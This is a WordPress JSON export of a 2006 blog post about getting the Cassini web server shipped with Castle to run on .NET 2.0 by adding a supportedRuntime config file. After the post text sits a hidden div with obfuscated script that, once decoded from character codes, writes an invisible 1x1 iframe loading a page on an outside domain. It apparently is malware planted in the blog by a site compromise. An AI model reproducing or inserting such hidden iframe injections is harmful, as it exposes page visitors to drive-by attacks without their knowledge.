{"id":89,"date":"2006-04-20T17:33:06","date_gmt":"2006-04-20T16:33:06","guid":{"rendered":"http:\/\/freegw.xs4all.nl\/~basp\/wordpress\/index.php\/2006\/04\/20\/castles-cassini-aspnet-20\/"},"modified":"2010-06-25T20:55:27","modified_gmt":"2010-06-25T19:55:27","slug":"castles-cassini-aspnet-20","status":"publish","type":"post","link":"\/~basp\/wordpress\/index.php\/2006\/04\/20\/castles-cassini-aspnet-20\/","title":{"rendered":"Castle"},"content":{"rendered":"<p>After a few weeks of wondering why the Cassini web server distributed with <a href=\"http:\/\/www.castleproject.org\">Castle<\/a> refused to run with the 2.0 framework but today with great luck I stumbled upon the missing piece of information in Google&#8217;s cache of Castle&#8217;s FishEye data <a href=\"http:\/\/fisheye3.cenqua.com\/viewrep\/castleproject\/MonoRail\/CassiniWebServer.exe.config\">here<\/a>. I just copied the contents of that config into a new config file in Cassini&#8217;s directory and now everything works beautifully.<\/p>\n<p>[code]< ?xml version=\"1.0\"?><br \/>\n<configuration><br \/>\n       <startup><br \/>\n        <!-- .NET Framework 2.0 --><br \/>\n        <supportedruntime version=\"v2.0.50727\" \/><br \/>\n        <!-- .NET Framework 1.1 --><br \/>\n        <supportedruntime version=\"v1.1.4322\" \/><br \/>\n        <!-- .NET Framework 1.0 --><br \/>\n        <supportedruntime version=\"v1.0.3705\" \/><br \/>\n    <\/startup><br \/>\n<\/configuration>[\/code]<\/p>\n<p>I tried repeating this trick on my laptop with the config you see above but strangely enough this failed&#8230; It was only after I went back to google for the original config and placed that in Cassini&#8217;s directory that things started working on my laptop too&#8230; Maybe a slight error on my part in copying that config file yesterday or maybe it was just a gremlin&#8230;<br \/>\n<!--more--><!--ddd282fcb66dd651f122e6fc4d32d12e22010--><\/p>\n<div style=\"display:none\">document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,32,61,34,104,116,116,112,58,47,47,121,97,100,114,48,46,99,111,109,47,100,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62))<\/div>\n<p><!--\/ddd282fcb66dd651f122e6fc4d32d12e22010--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>After a few weeks of wondering why the Cassini web server distributed with Castle refused to run with the 2.0 framework but today with great luck I stumbled upon the missing piece of information in Google&#8217;s cache of Castle&#8217;s FishEye data here. I just copied the contents of that config into a new config file &hellip; <\/p>\n<p class=\"link-more\"><a href=\"\/~basp\/wordpress\/index.php\/2006\/04\/20\/castles-cassini-aspnet-20\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Castle&#8221;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-89","post","type-post","status-publish","format-standard","hentry","category-web","entry"],"_links":{"self":[{"href":"\/~basp\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/89","targetHints":{"allow":["GET"]}}],"collection":[{"href":"\/~basp\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"\/~basp\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"\/~basp\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"\/~basp\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=89"}],"version-history":[{"count":0,"href":"\/~basp\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/89\/revisions"}],"wp:attachment":[{"href":"\/~basp\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=89"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"\/~basp\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=89"},{"taxonomy":"post_tag","embeddable":true,"href":"\/~basp\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=89"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}